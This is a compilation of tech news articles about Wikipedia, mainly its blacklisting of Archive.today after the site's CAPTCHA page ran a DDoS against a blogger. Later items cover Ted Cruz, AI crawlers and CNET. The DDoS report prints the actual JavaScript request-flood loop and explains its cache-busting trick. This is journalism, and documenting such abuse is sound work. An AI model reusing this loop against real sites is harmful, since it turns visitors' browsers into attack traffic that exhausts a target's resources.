
Wikipedia blacklists Archive.today, starts removing 695,000 archive links

The English-language edition of Wikipedia is blacklisting Archive.today after the controversial archive site was used to direct a distributed denial of service (DDoS) attack against a blog.

In the course of discussing whether Archive.today should be deprecated because of the DDoS, Wikipedia editors discovered that the archive site altered snapshots of webpages to insert the name of the blogger who was targeted by the DDoS. The alterations were apparently fueled by a grudge against the blogger over a post that described how the Archive.today maintainer hid their identity behind several aliases.

“There is consensus to immediately deprecate archive.today, and, as soon as practicable, add it to the spam blacklist (or create an edit filter that blocks adding new links), and remove all links to it,” stated an update today on Wikipedia’s Archive.today discussion. “There is a strong consensus that Wikipedia should not direct its readers towards a website that hijacks users’ computers to run a DDoS attack (see WP:ELNO#3). Additionally, evidence has been presented that archive.today’s operators have altered the content of archived pages, rendering it unreliable.”

More than 695,000 links to Archive.today are distributed across 400,000 or so Wikipedia pages. The archive site is commonly used to bypass news paywalls, and the FBI has sought information on the site operator’s identity with a subpoena to domain registrar Tucows.

“Those in favor of maintaining the status quo rested their arguments primarily on the utility of archive.today for verifiability,” said today’s Wikipedia update. “However, an analysis of existing links has shown that most of its uses can be replaced. Several editors started to work out implementation details during this RfC [request for comment] and the community should figure out how to efficiently remove links to archive.today.”

Editors urged to remove links

Guidance published as a result of the decision asked editors to help remove and replace links to the following domain names used by the archive site: archive.today, archive.is, archive.ph, archive.fo, archive.li, archive.md, and archive.vn. The guidance says editors can remove Archive.today links when the original source is still online and has identical content; replace the archive link so it points to a different archive site, like the Internet Archive, Ghostarchive, or Megalodon; or “change the original source to something that doesn’t need an archive (e.g., a source that was printed on paper), or for which a link to an archive is only a matter of convenience.”
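The replacement effort is largely mechanical: find the archive-family links on a page, then check whether the original source is still live. As a rough sketch of the first step (the function name, regex, and structure are hypothetical, not part of any actual Wikipedia tooling), a helper could scan wikitext for links to the blacklisted domains:

```javascript
// Hypothetical sketch: find links to the archive.today family of domains
// in a chunk of wikitext. The domain list is the one from the guidance
// above; everything else here is illustrative.
const ARCHIVE_DOMAINS = [
  "archive.today", "archive.is", "archive.ph", "archive.fo",
  "archive.li", "archive.md", "archive.vn",
];

function findArchiveLinks(wikitext) {
  // Capture the host of each http(s) URL, stopping at whitespace,
  // "]" (external-link close), or "|" (template separator).
  const urlPattern = /https?:\/\/([^\/\s\]|]+)[^\s\]|]*/g;
  const hits = [];
  for (const match of wikitext.matchAll(urlPattern)) {
    const host = match[1].toLowerCase().replace(/^www\./, "");
    if (ARCHIVE_DOMAINS.includes(host)) {
      hits.push(match[0]);
    }
  }
  return hits;
}
```

Each hit would then be checked against the original URL recorded in the citation: if the original still resolves with identical content, the archive link can simply be dropped; otherwise it would be swapped for a snapshot on the Internet Archive, Ghostarchive, or Megalodon.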


Archive.today CAPTCHA page executes DDoS; Wikipedia considers banning site


DDoS hit blog that tried to uncover Archive.today founder’s identity in 2023.

Credit: Getty Images | Riccardo Milani

Wikipedia editors are discussing whether to blacklist Archive.today because the archive site was used to direct a distributed denial of service (DDoS) attack against a blogger who wrote a post in 2023 about the mysterious website’s anonymous maintainer.

In a request for comment page, Wikipedia’s volunteer editors were presented with three options. Option A is to remove or hide all Archive.today links and add the site to the spam blacklist. Option B is to deprecate Archive.today, discouraging future link additions while keeping the existing archived links. Option C is to do nothing and maintain the status quo.

Option A in particular would be a huge change, as more than 695,000 links to Archive.today are used across 400,000 or so Wikipedia pages. Archive.today, also known as Archive.is, is a website that saves snapshots of webpages and is commonly used to bypass news paywalls.

“Archive.today uses advanced scraping methods, and is generally considered more reliable than the Internet Archive,” the Wikipedia request for comment said. “Due to concerns about botnets, linkspamming, and how the site is run, the community decided to blacklist it in 2013. In 2016, the decision was overturned, and archive.today was removed from the spam blacklist.”

Discussion among editors has been ongoing since February 7. “Wikipedia’s need for verifiable citations is absolutely not more important than the security of users,” one editor in favor of blacklisting wrote. “We need verifiable citations so that we can maintain readers’ trust, however, in order to be trustworthy our references also have to be safe to access.”

Archive would be hard to replace

On the other side, an editor who supported Option C wrote that “Archive.today contains a vast amount of archives available nowhere else. Not on Wayback Machine, nowhere. It is the second largest archive provider across all Wikimedia sites. Removal/blockage of this site will be disruptive daily for thousands of editors and readers. It will result in a huge proliferation of dead link tags that will never be resolved.”

Several posts mentioned an ongoing FBI case that could eventually make the Archive.today links useless anyway. Some said it would be better to act now than to have Option A forced on them later without a backup plan.

One editor supported starting with Option B and eventually shifting to Option A with “the proper end goal being the WMF [Wikimedia Foundation] supporting some sort of archive system, whether their own original or directly supporting the Internet Archive’s work so it can be done more systematically.”

Some discussion centered on copyright infringement, given that Archive.today publishes copies of many copyrighted articles. “On the general problem of linking to copyright infringement: perhaps the Wikimedia Foundation can work on ways to establish legally licensed archives of major paywalled sites, in partnership with archives such as the Internet Archive,” one editor wrote. “It would be challenging given the business model of those sites, but maybe a workable compromise can be established that manages how many Wikipedia editors [have] access at a given time.”

Malicious code in CAPTCHA page

The DDoS attack being discussed by Wikipedia editors was targeted at the Gyrovague blog written by Jani Patokallio. Last month, “the maintainers of Archive.today injected malicious code in order to perform a distributed denial of service attack against a person they were in dispute with,” the Wikipedia request for comment says. “Every time a user encounters the CAPTCHA page, their Internet connection is used to attack a certain individual’s blog.”

The trustworthiness of Archive.today was discussed in light of evidence that the site’s founder threatened to create “a new category of AI porn” in retaliation against the blogger. The AI porn threat was mentioned by several editors.

“I echo others [that Option] A is looking like something we’ll have to do eventually, anyways, and at least this way we have a chance to do it on our terms,” one editor wrote. “I hate to break it to you, but even if the FBI thing goes nowhere, a website whose operator apparently threatens to create AI porn in retaliation against enemies, using their names, isn’t a trustworthy mirror, and isn’t going to remain one.”

One editor reported being “miserable” about supporting Option A, “but we cannot permit websites to rope our readers into being part of DDoS attacks.” Moreover, “The fact is that most of the archive.today links on Wikipedia are not an attempt to save URLs that have now gone dead that the Internet Archive cannot handle, but efforts to bypass paywalls, which is convenient, but illegal. It’s strange that we accept links to archive.today for this purpose but don’t accept the same for Anna’s Archive or Sci-Hub,” the editor wrote.

Patokallio told us in an email today, “it’s true that there simply are no alternatives to archive.today for many sources that archive.org does not/cannot cover,” and that he hopes the Wikipedia request for comment “leads to the Wikimedia Foundation creating one as suggested by multiple commenters in the thread.”

We emailed Archive.today’s webmaster address today about the Wikipedia discussion and will update this article if we get a response.

The Wikimedia Foundation, the nonprofit that hosts Wikipedia, chimed in on the discussion today. “Our view is that the value to verifiability that the site provides must be weighed against the security risks and violation of the trust of the people who click these links,” wrote Eric Mill, head of the foundation’s product safety and integrity group. “We (WMF) encourage the English Wikipedia community to carefully weigh the situation before making a decision on this unusual case.”

Noting that “Archive.today’s owner has not been deterred from continuing the ongoing DDoS,” Mill wrote that “the same actions that make archive.today unsafe may also reduce its usefulness for verifying content on Wikipedia. If the owners are willing to abuse their position to further their goals through malicious code, then it also raises questions about the integrity of the archive it hosts.”

It’s possible the Wikimedia Foundation will act even if the volunteer editors decide to maintain the status quo. “We know that WMF intervention is a big deal, but we also have not ruled it out, given the seriousness of the security concern for people who click the links that appear across many wikis,” Mill wrote.

Blogger tried to uncover founder’s identity

The Wikipedia request for comment acknowledged that deciding whether to blacklist the site would be difficult. There are “significant concerns for readers’ safety, as well as the long-term stability and integrity of the service,” but “a significant amount of people also think that mass-removing links to Archive.today may harm verifiability, and that the service is harder to censor than certain other archiving sites,” it said.

An update to the request for comments yesterday indicated that the attack temporarily stopped, but the malicious code had been reactivated. “Please do not visit the archive without blocking network requests to gyrovague.com to avoid being part of the attack!” it said.

The code’s first public mention was apparently in a Hacker News thread on January 14, and Patokallio wrote about the DDoS in a February 1 blog post. “Every 300 milliseconds, as long as the CAPTCHA page is open, this makes a request to the search function of my blog using a random string, ensuring the response cannot be cached and thus consumes resources,” he wrote. The JavaScript code in the Archive.today CAPTCHA page is as follows:

        setInterval(function() {
            fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
                referrerPolicy: "no-referrer",
                mode: "no-cors"
            });
        }, 300);
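The `?s=` value is what makes this effective against caches: `Math.random().toString(36)` renders a random float as base-36 digits, and the substring bounds depend on a second random draw, so each request carries a search term of up to nine lowercase alphanumeric characters that is almost never repeated. A minimal illustration (the helper name is mine, not from the attack code):

```javascript
// Illustration of the cache-busting trick from the snippet above:
// a fresh random search term for every request, so no CDN or server
// cache can serve a stored response.
function randomSearchTerm() {
  // "0.k3x9..." in base 36, with the leading "0." stripped and a
  // randomly chosen length of up to nine characters.
  return Math.random().toString(36).substring(2, 3 + Math.random() * 8);
}
```

Because the term changes every 300 milliseconds on every visitor’s machine, each hit forces the blog’s search function to do real work, which is exactly the resource exhaustion Patokallio described.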

In August 2023, Patokallio wrote a post attempting to uncover the identity of Archive.today founder “Denis Petrov,” which seems to be an alias. Patokallio wasn’t able to figure out who the founder is but cobbled together various tidbits from Internet searches, including a Stack Exchange post that mentioned another potential alias, “Masha Rabinovich.”

Patokallio seemed to be driven by curiosity and was impressed by Archive.today’s work. “It’s a testament to their persistence that [they’ve] managed to keep this up for over 10 years, and I for one will be buying Denis/Masha/whoever a well deserved cup of coffee,” Patokallio’s 2023 post said. In his post this month, Patokallio said his 2023 blog “gathered some 10,000 views and a bit [of] discussion on Hacker News, but didn’t exactly set the blogosphere on fire. And indeed, absolutely nothing happened for the next two years and a bit.”

FBI case revives interest in 2023 blog

But in October 2025, the FBI sent a subpoena to domain registrar Tucows seeking “subscriber information on [the] customer behind archive.today” in connection with “a federal criminal investigation being conducted by the FBI.” We wrote about the subpoena, and our story included a link to Patokallio’s 2023 blog post in a sentence that said, “There are several indications that the [Archive.today] founder is from Russia.”

In an email to Ars, Patokallio told us that the DDoS attack “appears to be because you kindly mentioned my blog in your Nov 8, 2025 story.” Patokallio added that he is “as mystified by this as you probably are.” Articles about the subpoena by The Verge and Heise Online also linked to Patokallio’s 2023 blog post.

On January 8, 2026, Patokallio’s hosting company, Automattic, notified him that it received a GDPR [General Data Protection Regulation] complaint from a “Nora Puchreiner” alleging that the 2023 post “contains extensive personal data… presented in a narrative that is defamatory in tone and context.” Patokallio said that after he submitted a rebuttal, “Automattic sided with me and left the post up.”

Patokallio said he also “received a politely worded email from archive.today’s webmaster asking me to take down the post for a few months” on January 10. The email was classified as spam by Gmail, and he didn’t see it until five days later, he said. In the meantime, the DDoS started.

Patokallio said he replied to the webmaster’s email on January 15 and again on January 20 but didn’t hear back. He tried a third time on January 25, saying he would not take down the blog post but offered to “change some wording that you feel is being misrepresented.”

Emails threatened AI porn and other scams

Patokallio posted what he called a lightly redacted copy of the resulting email thread. The first email from the Archive.today webmaster said, “I do not mind the post, but the issue is: journos from mainstream media (Heise, Verge, etc) cherry-pick just a couple of words from your blog, and then construct very different narratives having your post the only citable source; then they cite each other and produce a shitty result to present for a wide audience.”

In a later email, “Nora Puchreiner” wrote, “I do not care on your blog and its content. I just need the links from Heise and other media to be 404.” One message threatened to investigate “your Nazi grandfather” and “vibecode a gyrovague.gay dating app.” Another threatened to create a public association between Patokallio’s name and AI porn.

A Tumblr blog post apparently written by the Archive.today founder seems to generally confirm the emails’ veracity, but says the original version threatened to create “a patokallio.gay dating app,” not “a gyrovague.gay dating app.” The Tumblr blog has several other recent posts criticizing Patokallio and accusing him of hiding his real name. However, the Gyrovague blog shows Patokallio’s name in a sidebar and discloses that he works for Google in Sydney, Australia, while stating that the blog posts contain only his personal views.

In one email, Patokallio included a link to Wikipedia’s page on the Streisand effect, a name for situations in which people seeking to suppress access to information instead draw more public attention to the information they want hidden. The Archive.today site maintainer apparently viewed this as a threat.

“And threatening me with Streisand… having such a noble and rare name, which in retaliation could be used for the name of a scam project or become a byword for a new category of AI porn… are you serious?” the email said. Patokallio responded, “No, you’re Streisanding yourself: the DDOS has already drawn more attention to my blog post than it had gotten in the last two years, with zero action on my side.”

A subsequent reply in the email thread contained the “Nazi grandfather” and “gay dating app” threats. Patokallio wrote that after these emails, it didn’t seem worthwhile to continue the discussion. “At this point it was pretty clear the conversation had run its course, so here we are,” Patokallio wrote in his February 1 blog post. “And for the record, my long-dead grandfather served in an anti-aircraft unit of the Finnish Army during WW2, defending against the attacks of the Soviet Union. Perhaps this is enough to qualify as a ‘Nazi’ in Russia these days.”

While the outcome at Wikipedia is not yet settled, Patokallio wrote that the DDoS attack didn’t cause him any real harm. The Archive.today maintainer apparently intended to make Patokallio’s hosting costs more expensive, but “I have a flat fee plan, meaning this has cost me exactly zero dollars,” he wrote.

This article was updated with a statement from the Wikimedia Foundation and further comment from Patokallio.

Jon is a Senior IT Reporter for Ars Technica. He covers the telecom industry, Federal Communications Commission rulemakings, broadband consumer affairs, court cases, and government regulation of the tech industry.


Ted Cruz doesn’t seem to understand Wikipedia, lawyer for Wikimedia says



Wikipedia host’s lawyer wants to help Ted Cruz understand how the platform works.

Senator Ted Cruz (R-Texas) uses his phone during a joint meeting of Congress on May 17, 2022. Credit: Getty Images | Bloomberg

The letter from Sen. Ted Cruz (R-Texas) accusing Wikipedia of left-wing bias seems to be based on fundamental misunderstandings of how the platform works, according to a lawyer for the nonprofit foundation that operates the online encyclopedia.

“The foundation is very much taking the approach that Wikipedia is actually pretty great and a lot of what’s in this letter is actually misunderstandings,” Jacob Rogers, associate general counsel at the Wikimedia Foundation, told Ars in an interview. “And so we are more than happy, despite the pressure that comes from these things, to help people better understand how Wikipedia works.”

Cruz’s letter to Wikimedia Foundation CEO Maryana Iskander expressed concern “about ideological bias on the Wikipedia platform and at the Wikimedia Foundation.” Cruz alleged that Wikipedia articles “often reflect a left-wing bias.” He asked the foundation for “documents sufficient to show what supervision, oversight, or influence, if any, the Wikimedia Foundation has over the editing community,” and “documents sufficient to show how the Wikimedia Foundation addresses political or ideological bias.”

As many people know, Wikipedia is edited by volunteers through a collaborative process.

“We’re not deciding what the editorial policies are for what is on Wikipedia,” Rogers said, describing the Wikimedia Foundation’s hands-off approach. “All of that, both the writing of the content and the determining of the editorial policies, is done through the volunteer editors” through “public conversation and discussion and trying to come to a consensus. They make all of that visible in various ways to the reader. So you go and you read a Wikipedia article, you can see what the sources are, what someone has written, you can follow the links yourselves.”

“They’re worried about something that is just not present at all”

Cruz’s letter raised concerns about “the influence of large donors on Wikipedia’s content creation or editing practices.” But Rogers said that “people who donate to Wikipedia don’t have any influence over content and we don’t even have that many large donors to begin with. It is primarily funded by people donating through the website fundraisers, so I think they’re worried about something that is just not present at all.”

Anyone unhappy with Wikipedia content can participate in the writing and editing, he said. “It’s still open for everybody to participate. If someone doesn’t like what it says, they can go on and say, ‘Hey, I don’t like the sources that are being used, or I think a different source should be used that isn’t there,'” Rogers said. “Other people might disagree with them, but they can have that conversation and try to figure it out and make it better.”

Rogers said that some people wrongly assume there is central control over Wikipedia editing. “I feel like people are asking questions assuming that there is something more central that is controlling all of this that doesn’t actually exist,” he said. “I would love to see it a little better understood about how this sort of public model works and the fact that people can come judge it for themselves and participate for themselves. And maybe that will have it sort of die down as a source of government pressure, government questioning, and go onto something else.”

Cruz’s letter accused Wikipedia of pushing antisemitic narratives. He described the Wikimedia Foundation as “intervening in editorial decisions” in an apparent reference to an incident in which the platform’s Arbitration Committee responded to editing conflicts on the Israeli–Palestinian conflict by banning eight editors.

“The Wikimedia Foundation has said it is taking steps to combat this editing campaign, raising further questions about the extent to which it is intervening in editorial decisions and to what end,” Cruz wrote.

Explaining the Arbitration Committee

The Arbitration Committee for the English-language edition of Wikipedia consists of volunteers who “are elected by the rest of the English Wikipedia editors,” Rogers said. The group is a “dispute resolution body when people can’t otherwise resolve their disputes.” The committee made “a ruling on Israel/Palestine because it is such a controversial subject and it’s not just banning eight editors, it’s also how contributions are made in that topic area and sort of limiting it to more experienced editors,” he said.

The members of the committee “do not control content,” Rogers said. “The arbitration committee is not a content dispute body. They’re like a behavior conduct dispute body, but they try to set things up so that fights will not break out subsequently.”

As with other topics, people can participate if they believe articles are antisemitic. “That is sort of squarely in the user editorial processes,” Rogers said. “If someone thinks that something on Wikipedia is antisemitic, they should change it or propose to people working on it that they change it or change sources. I do think the editorial community, especially on topics related to antisemitism and related to Israel/Palestine, has a lot of various safeguards in place. That particular topic is probably the most controversial topic in the world, but there’s still a lot of editorial safeguards in place where people can discuss things. They can get help with dispute resolution from bringing in other editors if there’s a behavioral problem, they can ask for help from Wikipedia administrators, and all the way up to the English Wikipedia arbitration committee.”

Cruz’s letter called out Wikipedia’s goal of “knowledge equity,” and accused the foundation of favoring “ideology over neutrality.” Cruz also pointed to a Daily Caller report that the foundation donated “to activist groups seeking to bring the online encyclopedia more in line with traditionally left-of-center points of view.”

Rogers countered that “the theory behind that is sort of misunderstood by the letter where it’s not about equity like the DEI equity, it is about the mission of the Wikimedia Foundation to have the world’s knowledge, to prepare educational content and to have all the different knowledge in the world to the extent possible.” In topic areas where people with expertise haven’t contributed much to Wikipedia, “we are looking to write grants to help fill in those gaps in knowledge and have a more broad range of information and sources,” he said.

What happens next

Rogers is familiar with the workings of Senate investigations from personal experience. He joined the Wikimedia Foundation in 2014 after working for the Senate’s Permanent Subcommittee on Investigations under the late Sen. Carl Levin (D-Mich.).

While Cruz demanded a trove of documents, Rogers said the foundation doesn’t necessarily have to provide them. A subpoena could be issued to Wikimedia, but that hasn’t happened.

“What Cruz has sent us is just a letter,” Rogers said. “There is no legal proceeding whatsoever. There’s no formal authority behind this letter. It’s just a letter from a person in the legislative branch who cares about the topic, so there is nothing compelling us to give him anything. I think we are probably going to answer the letter, but there’s no sort of legal requirement to actually fully provide everything that answers every question.” Assuming it responds, the foundation would try to answer Cruz’s questions “to the extent that we can, and without violating any of our company policies,” and without giving out nonpublic information, he said.

A letter responding to Cruz wouldn’t necessarily be made public. In April, the foundation received a letter from 23 lawmakers about alleged antisemitism and anti-Israel bias. The foundation’s response to that letter is not public.

Cruz is seeking changes at Wikipedia just a couple weeks after criticizing Federal Communications Commission Chairman Brendan Carr for threatening ABC with station license revocations over political content on Jimmy Kimmel’s show. While the pressure tactics used by Cruz and Carr have similarities, Rogers said there are also key differences between the legislative and executive branches.

“Congressional committees, they are investigating something to determine what laws to make, and so they have a little bit more freedom to just look into the state of the world to try to decide what laws they want to write or what laws they want to change,” he said. “That doesn’t mean that they can’t use their authority in a way that might ultimately go down a path of violating the First Amendment or something like that. They have a little bit more runway to get there versus an executive branch agency which, if it is pressuring someone, it is doing so for a very immediate decision usually.”

What does Cruz want? It’s unclear

Rogers said it’s not clear whether Cruz’s inquiry is the first step toward changing the law. “The questions in the letter don’t really say why they want the information they want other than the sort of immediacy of their concerns,” he said.

Cruz chairs the Senate Commerce Committee, which “does have lawmaking authority over the Internet writ large,” Rogers said. “So they may be thinking about changes to the law.”

One potential target is Section 230 of the Communications Decency Act, which gives online platforms immunity from lawsuits over how they moderate user-submitted content.

“From the perspective of the foundation, we’re staunch defenders of Section 230,” Rogers said, adding that Wikimedia supports “broad laws around intellectual property and privacy and other things that allow a large amount of material to be appropriately in the public domain, to be written about on a free encyclopedia like Wikipedia, but that also protect the privacy of editors who are contributing to Wikipedia.”


Ted Cruz picks a fight with Wikipedia, accusing platform of left-wing bias

Cruz pressures Wikipedia after criticizing FCC chair

Cruz sent the letter about two weeks after criticizing Federal Communications Commission Chairman Brendan Carr for threatening ABC with station license revocations over political content on Jimmy Kimmel’s show. Cruz said that using the government to dictate what the media can say “will end up bad for conservatives” because when Democrats are back in power, “they will silence us, they will use this power, and they will use it ruthlessly.” Cruz said that Carr threatening ABC was like “a mafioso coming into a bar going, ‘Nice bar you have here, it’d be a shame if something happened to it.'”

Cruz, who chairs the Senate Commerce Committee, doesn’t mind using his authority to pressure Wikipedia’s operator, however. “The Standing Rules of the Senate grant the Committee on Commerce, Science, and Transportation jurisdiction over communications, including online information platforms,” he wrote to the Wikimedia Foundation. “As the Chairman of the Committee, I request that you provide written responses to the questions below, as well as requested documents, no later than October 17, 2025, and in accordance with the attached instructions.”

We asked Cruz’s office to explain why a senator pressuring Wikipedia is appropriate while an FCC chair pressuring ABC is not and will update this article if we get a response.

Among other requests, Cruz asked for “documents sufficient to show what supervision, oversight, or influence, if any, the Wikimedia Foundation has over the editing community,” and “documents sufficient to show how the Wikimedia Foundation addresses political or ideological bias.”

Cruz has separately been launching investigations into the Biden administration for alleged censorship. He issued a report allegedly “revealing how the Biden administration transformed the Cybersecurity and Infrastructure Security Agency (CISA) into an agent of censorship pressuring Big Tech to police speech,” and scheduled a hearing for Wednesday titled, “Shut Your App: How Uncle Sam Jawboned Big Tech Into Silencing Americans.”

Cruz’s letter to Wikimedia seeks evidence that could figure into his ongoing investigations into the Biden administration. “Provide any and all documents and communications—including emails, texts, or other digital messages—between any officer, employee, or agent of the Wikimedia Foundation and any officer, employee, or agent of the federal government since January 1, 2020,” the letter said.


Dedicated volunteer exposes “single largest self-promotion operation in Wikipedia’s history”

After a reduction in activity, things ramped up again in 2021, as IP addresses from around the world started creating Woodard references and articles once more. For instance, “addresses from Canada, Germany, Indonesia, the UK and other places added some trivia about Woodard to all 15 Wikipedia articles about the calea ternifolia.”

Then things got “more sophisticated.” From December 2021 through June 2025, 183 articles were created about Woodard, each in a different language’s Wikipedia and each by a unique account. These accounts followed a pattern of behavior: They were “created, often with a fairly generic name, and made a user page with a single image on it. They then made dozens of minor edits to unrelated articles, before creating an article about David Woodard, then making a dozen or so more minor edits before disappearing off the platform.”

Grnrchst believes that all the activity was meant to “create as many articles about Woodard as possible, and to spread photos of and information on Woodard to as many articles as possible, while hiding that activity as much as possible… I came to believe that David Woodard himself, or someone close to him, had been operating this network of accounts and IP addresses for the purposes of cynical self-promotion.”

After the Grnrchst report, Wikipedia’s global stewards removed 235 articles on Woodard from Wikipedia instances with few users or administrators. Larger Wikipedias were free to make their own community decisions, and they removed another 80 articles and banned numerous accounts.

“A full decade of dedicated self-promotion by an individual network has been undone in only a few weeks by our community,” Grnrchst noted.

In the end, just 20 articles about Woodard remain, such as this one in English, which does not mention the controversy.

We were unable to get in touch with Woodard, whose personal website is password-protected and only available “by invitation.”

Could the whole thing be some kind of “art project,” with the real payoff being exposure and being written about? Perhaps. But whatever the motive behind the decade-long effort to boost Woodard on Wikipedia, the incident reminds us just how much effort some people are willing to put into polluting open or public-facing projects for their own ends.

“Yuck”: Wikipedia pauses AI summaries after editor revolt

Generative AI is permeating the Internet, with chatbots and AI summaries popping up faster than we can keep track. Even Wikipedia, the vast repository of knowledge famously maintained by an army of volunteer human editors, is looking to add robots to the mix. The site began testing AI summaries in some articles over the past week, but the project has been frozen after editors voiced their opinions. And that opinion is: “yuck.”

The seeds of this project were planted at Wikimedia’s 2024 conference, where foundation representatives and editors discussed how AI could advance Wikipedia’s mission. The wiki page for the so-called “Simple Article Summaries” project notes that the editors who participated in the discussion believed the summaries could improve learning on Wikipedia.

According to 404 Media, Wikipedia announced the opt-in AI pilot on June 2, which was set to run for two weeks on the mobile version of the site. The summaries appeared at the top of select articles in a collapsed form. Users had to tap to expand and read the full summary. The AI text also included a highlighted “Unverified” badge.

Feedback from the larger community of editors was immediate and harsh. Some of the first comments were simply “yuck,” with others calling the addition of AI a “ghastly idea” and “PR hype stunt.”

Others expounded on the issues with adding AI to Wikipedia, citing a potential loss of trust in the site. Editors work together to ensure articles are accurate, featuring verifiable information and a neutral point of view. However, nothing is certain when you put generative AI in the driver’s seat. “I feel like people seriously underestimate the brand risk this sort of thing has,” said one editor. “Wikipedia’s brand is reliability, traceability of changes, and ‘anyone can fix it.’ AI is the opposite of these things.”

AI bots strain Wikimedia as bandwidth surges 50%

Crawlers that evade detection

Making the situation more difficult, many AI-focused crawlers do not play by established rules. Some ignore robots.txt directives. Others spoof browser user agents to disguise themselves as human visitors. Some even rotate through residential IP addresses to avoid blocking, tactics that have become common enough to force individual developers like Xe Iaso to adopt drastic protective measures for their code repositories.
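Robots.txt compliance is entirely voluntary: a polite crawler checks the file before each fetch, and that check is precisely the step evasive bots skip. A minimal sketch using Python’s standard urllib.robotparser shows what honoring the protocol looks like (the directives and crawler name below are hypothetical, not Wikimedia’s actual rules):

```python
from urllib.robotparser import RobotFileParser

# Hypothetical robots.txt directives a site might serve to throttle crawlers.
rules = [
    "User-agent: *",
    "Crawl-delay: 10",
    "Disallow: /w/",
]

parser = RobotFileParser()
parser.parse(rules)

# A well-behaved crawler asks before fetching; evasive bots simply never do.
print(parser.can_fetch("MyCrawler", "https://example.org/w/index.php"))    # False
print(parser.can_fetch("MyCrawler", "https://example.org/wiki/Main_Page"))  # True
print(parser.crawl_delay("MyCrawler"))                                      # 10
```

Nothing enforces the answer: a scraper that spoofs a browser user agent or ignores the file entirely gets the content anyway, which is why sites fall back to rate limiting and IP-level defenses.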

This leaves Wikimedia’s Site Reliability team in a perpetual state of defense. Every hour spent rate-limiting bots or mitigating traffic surges is time not spent supporting Wikimedia’s contributors, users, or technical improvements. And it’s not just content platforms under strain. Developer infrastructure, like Wikimedia’s code review tools and bug trackers, is also frequently hit by scrapers, further diverting attention and resources.

These problems mirror issues seen elsewhere in the AI scraping ecosystem. Curl developer Daniel Stenberg has previously detailed how fake, AI-generated bug reports waste human time. On his blog, SourceHut’s Drew DeVault has highlighted how bots hammer endpoints like git logs, far beyond what human developers would ever need.

Across the Internet, open platforms are experimenting with technical solutions: proof-of-work challenges, slow-response tarpits (like Nepenthes), collaborative crawler blocklists (like “ai.robots.txt”), and commercial tools like Cloudflare’s AI Labyrinth. These approaches address the technical mismatch between infrastructure designed for human readers and the industrial-scale demands of AI training.
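Proof-of-work challenges invert the cost asymmetry: before the server hands over a page, the client must burn CPU finding an answer that the server can check with a single hash. A minimal, hashcash-style sketch of the idea (illustrative only; real deployments tune the difficulty and bind the challenge to the request):

```python
import hashlib

def find_proof(challenge: str, difficulty: int) -> int:
    """Client side: brute-force a nonce until sha256(challenge:nonce)
    starts with `difficulty` hex zeros. Cost grows ~16x per extra zero."""
    target = "0" * difficulty
    nonce = 0
    while True:
        digest = hashlib.sha256(f"{challenge}:{nonce}".encode()).hexdigest()
        if digest.startswith(target):
            return nonce
        nonce += 1

def verify_proof(challenge: str, nonce: int, difficulty: int) -> bool:
    """Server side: one hash to verify, no matter how long the search took."""
    digest = hashlib.sha256(f"{challenge}:{nonce}".encode()).hexdigest()
    return digest.startswith("0" * difficulty)

# The server issues a per-session challenge; the client pays, the server checks.
nonce = find_proof("session-token-123", difficulty=3)
assert verify_proof("session-token-123", nonce, difficulty=3)
```

For a human loading one page, the delay is negligible; for a scraper fetching millions of pages, the aggregate CPU cost becomes prohibitive, which is the entire point of the scheme.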

Open commons at risk

Wikimedia acknowledges the importance of providing “knowledge as a service,” and its content is indeed freely licensed. But as the Foundation states plainly, “Our content is free, our infrastructure is not.”

The organization is now focusing on systemic approaches to this issue under a new initiative: WE5: Responsible Use of Infrastructure. It raises critical questions about guiding developers toward less resource-intensive access methods and establishing sustainable boundaries while preserving openness.

The challenge lies in bridging two worlds: open knowledge repositories and commercial AI development. Many companies rely on open knowledge to train commercial models but don’t contribute to the infrastructure making that knowledge accessible. This creates a technical imbalance that threatens the sustainability of community-run platforms.

Better coordination between AI developers and resource providers could potentially resolve these issues through dedicated APIs, shared infrastructure funding, or more efficient access patterns. Without such practical collaboration, the platforms that have enabled AI advancement may struggle to maintain reliable service. Wikimedia’s warning is clear: Freedom of access does not mean freedom from consequences.

AI-generated articles prompt Wikipedia to downgrade CNET’s reliability rating

The hidden costs of AI

Futurism report highlights the reputational cost of publishing AI-generated content.

Wikipedia has downgraded tech website CNET’s reliability rating following extensive discussions among its editors regarding the impact of AI-generated content on the site’s trustworthiness, as noted in a detailed report from Futurism. The decision reflects concerns over the reliability of articles found on the tech news outlet after it began publishing AI-generated stories in 2022.

Around November 2022, CNET began publishing articles written by an AI model under the byline “CNET Money Staff.” In January 2023, Futurism brought widespread attention to the issue and discovered that the articles were full of plagiarism and mistakes. (Around that time, we covered plans to do similar automated publishing at BuzzFeed.) After the revelation, CNET management paused the experiment, but the reputational damage had already been done.

Wikipedia maintains a page called “Reliable sources/Perennial sources” that includes a chart featuring news publications and their reliability ratings as viewed from Wikipedia’s perspective. Shortly after the CNET news broke in January 2023, Wikipedia editors began a discussion thread on the Reliable Sources project page about the publication.

“CNET, usually regarded as an ordinary tech RS [reliable source], has started experimentally running AI-generated articles, which are riddled with errors,” wrote a Wikipedia editor named David Gerard. “So far the experiment is not going down well, as it shouldn’t. I haven’t found any yet, but any of these articles that make it into a Wikipedia article need to be removed.”

After other editors agreed in the discussion, they began the process of downgrading CNET’s reliability rating.

As of this writing, Wikipedia’s Perennial Sources list features three entries for CNET, broken into three time periods: (1) before October 2020, when Wikipedia considered CNET a “generally reliable” source; (2) between October 2020 and October 2022, where Wikipedia notes that the site was acquired by Red Ventures in October 2020, “leading to a deterioration in editorial standards,” and says there is no consensus about reliability; and (3) from November 2022 to the present, where Wikipedia considers CNET “generally unreliable” after the site began using an AI tool “to rapidly generate articles riddled with factual inaccuracies and affiliate links.”

A screenshot of the chart featuring CNET’s reliability ratings, as found on Wikipedia’s “Perennial Sources” page.

Futurism reports that the issue with CNET’s AI-generated content also sparked a broader debate within the Wikipedia community about the reliability of sources owned by Red Ventures, such as Bankrate and CreditCards.com. Those sites published AI-generated content around the same period of time as CNET. The editors also criticized Red Ventures for not being forthcoming about where and how AI was being implemented, further eroding trust in the company’s publications. This lack of transparency was a key factor in the decision to downgrade CNET’s reliability rating.

In response to the downgrade and the controversies surrounding AI-generated content, CNET issued a statement claiming that the site maintains high editorial standards.

“CNET is the world’s largest provider of unbiased tech-focused news and advice,” a CNET spokesperson said in a statement to Futurism. “We have been trusted for nearly 30 years because of our rigorous editorial and product review standards. It is important to clarify that CNET is not actively using AI to create new content. While we have no specific plans to restart, any future initiatives would follow our public AI policy.”

